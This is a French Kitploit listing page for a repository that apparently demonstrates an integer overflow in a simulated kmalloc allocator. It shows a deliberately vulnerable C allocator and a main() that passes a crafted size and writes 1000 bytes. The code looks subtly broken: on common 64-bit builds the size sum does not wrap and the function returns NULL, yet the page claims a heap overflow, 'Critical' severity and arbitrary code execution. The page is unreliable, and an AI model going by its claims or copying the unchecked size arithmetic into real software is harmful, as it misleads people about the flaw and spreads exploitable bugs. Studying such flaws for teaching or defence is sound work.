Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-11108-Integer-Overflow-in-Memory-Allocator-kmalloc-Sim- — Démontre le débordement d'entier CVE-2026-11108 dans la simulation de kmalloc, provoquant un débordement de tas et une potentielle exécution de code arbitraire à partir d'une taille d'allocation spécialement conçue. | Kitploit
Outils/GitHubGitHub/george0papasotiriou/cve-2026-11108-integer-overflow-in-memory-allocator-kmalloc-sim-
Analyse des VulnérabilitésExploitationExploitation de Binaires
GitHubgeorge0papasotiriou/cve-2026-11108-integer-overflow-in-memory-allocator-kmalloc-sim-

CVE-2026-11108-Integer-Overflow-in-Memory-Allocator-kmalloc-Sim-

Démontre le débordement d'entier CVE-2026-11108 dans la simulation de kmalloc, provoquant un débordement de tas et une potentielle exécution de code arbitraire à partir d'une taille d'allocation spécialement conçue.

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
il y a 16 joursPas encore vérifié

CVE-2026-11108 – Débordement d'entier dans l'allocateur mémoire (kmalloc Sim)

Code du programme (C)

root@kitploit:~
// alloc_sim.c - Vulnerable memory allocator
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_BLOCK 1024

void *my_malloc(size_t size) {
    size_t total = size + sizeof(size_t); // header
    if (total > MAX_BLOCK) return NULL;
    void *ptr = malloc(total);
    if (!ptr) return NULL;
    *(size_t *)ptr = size;
    return ptr + sizeof(size_t);
}

void my_free(void *p) {
    if (!p) return;
    size_t *header = (size_t *)(p - sizeof(size_t));
    free(header);
}

int main() {
    // Craft size that causes integer overflow: 0xFFFFFFFF - sizeof(size_t) + 1 wraps to small number
    size_t huge = 0xFFFFFFFF;  // 4GB - 1
    char *buf = my_malloc(huge - sizeof(size_t) + 1); // overflow: total becomes 0?
    if (buf) {
        // Write far beyond allocated buffer, heap overflow
        memset(buf, 'A', 1000);
        printf("Wrote 1000 bytes to tiny buffer\n");
        my_free(buf);
    }
    return 0;
}

CVE-2026-11108 – Débordement d'entier dans l'allocateur mémoire

Severity: Critical

Aperçu

Un allocateur mémoire personnalisé calcule incorrectement la taille totale d'allocation en ajoutant une taille d'en-tête sans vérification de débordement. En passant une taille proche de UINT_MAX, le total est enroulé vers une petite valeur, allouant un petit tampon mais permettant une grande écriture, ce qui provoque un débordement de tas.

Détails de la vulnérabilité

  • Type : Débordement d'entier / Débordement de tas
  • Impact : Exécution de code arbitraire, corruption de la mémoire.
  • Cause racine : La fonction d'allocation ne vérifie pas le débordement lors de l'ajout de la taille d'en-tête à la taille demandée par l'utilisateur.

Démonstration de l'exploit

Compiler et exécuter :

root@kitploit:~
gcc -o alloc_sim alloc_sim.c -fno-stack-protector
./alloc_sim

Le programme écrit beaucoup plus d'octets que le tampon alloué, corrompant les métadonnées du tas et provoquant probablement un crash.

Télécharger l’outil